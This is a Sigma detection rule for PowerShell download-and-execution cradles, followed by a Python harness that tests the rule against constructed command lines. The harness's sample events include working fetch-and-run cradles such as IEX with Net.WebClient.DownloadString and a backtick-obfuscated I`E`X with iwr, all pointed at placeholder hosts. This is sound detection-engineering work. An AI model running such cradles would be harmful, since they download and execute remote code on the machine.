PowerShell Download and Execution Cradles

Detects PowerShell download and execution cradles.

Sigma rule

title: PowerShell Download and Execution Cradles
id: 85b0b087-eddf-4a2b-b033-d771fa2b9775
status: test
description: Detects PowerShell download and execution cradles.
references:
    - https://github.com/VirtualAlllocEx/Payload-Download-Cradles/blob/88e8eca34464a547c90d9140d70e9866dcbc6a12/Download-Cradles.cmd
    - https://labs.withsecure.com/publications/fin7-target-veeam-servers
author: Florian Roth (Nextron Systems)
date: 2022/03/24
modified: 2023/05/04
tags:
    - attack.execution
    - attack.t1059
logsource:
    product: windows
    category: process_creation
detection:
    selection_download:
        CommandLine|contains:
            - '.DownloadString('
            - '.DownloadFile('
            - 'Invoke-WebRequest '
            - 'iwr '
    selection_iex:
        CommandLine|contains:
            - ';iex $'
            - '| IEX'
            - '|IEX '
            - 'I`E`X'
            - 'I`EX'
            - 'IE`X'
            - 'iex '
            - 'IEX ('
            - 'IEX('
            - 'Invoke-Expression'
    condition: all of selection_*
falsepositives:
    - Some PowerShell installers were seen using similar combinations. Apply filters accordingly
level: high
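An added example, not part of the rule or of the Sigma project, that re-implements the two selections and the `all of selection_*` condition in Python and runs them over constructed process-creation events. It shows why a command line that only downloads, or only calls `iex`, does not fire, and why the backtick-split keyword variants still do. The sample events and their `.invalid` URLs are constructed for the test; Sigma `contains` matching is treated as case-insensitive, which is the default in Sigma but should be confirmed for the backend you convert the rule to.

```python
# Selection strings copied from the rule above.
SELECTION_DOWNLOAD = [
    ".DownloadString(", ".DownloadFile(", "Invoke-WebRequest ", "iwr ",
]
SELECTION_IEX = [
    ";iex $", "| IEX", "|IEX ", "I`E`X", "I`EX", "IE`X",
    "iex ", "IEX (", "IEX(", "Invoke-Expression",
]


def contains_any(command_line, needles):
    """Sigma 'contains' without modifiers: case-insensitive substring match."""
    haystack = command_line.lower()
    return any(needle.lower() in haystack for needle in needles)


def matches_rule(event):
    """True when a process_creation event satisfies 'all of selection_*'."""
    cmd = event.get("CommandLine", "")
    return contains_any(cmd, SELECTION_DOWNLOAD) and contains_any(cmd, SELECTION_IEX)


def evaluate(events):
    """Return one verdict per event, in order."""
    return [matches_rule(e) for e in events]


# Constructed sample events (not real telemetry); URLs are placeholders.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    # download + execute in one line: both selections hit -> alert
    {"Image": PS, "CommandLine":
     "powershell -nop -c \"IEX (New-Object Net.WebClient)"
     ".DownloadString('http://placeholder.invalid/a.ps1')\""},
    # backtick-split keyword plus the 'iwr ' alias: still both selections -> alert
    {"Image": PS, "CommandLine":
     "powershell -c \"I`E`X (iwr http://placeholder.invalid/b.ps1).Content\""},
    # download to disk only, no execution primitive -> no alert
    {"Image": PS, "CommandLine":
     "powershell -c \"Invoke-WebRequest -Uri http://placeholder.invalid/t.zip -OutFile t.zip\""},
    # local script executed via iex, nothing downloaded -> no alert
    {"Image": PS, "CommandLine":
     "powershell -c \"iex (Get-Content .\\script.ps1 -Raw)\""},
]

if __name__ == "__main__":
    for event, hit in zip(SAMPLE_EVENTS, evaluate(SAMPLE_EVENTS)):
        print("ALERT " if hit else "      ", event["CommandLine"])
```

The third and fourth events are the shape of the installer false positives the rule warns about; a filter on `Image` or parent process would be added as an extra selection in the condition rather than by loosening the `contains` lists.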
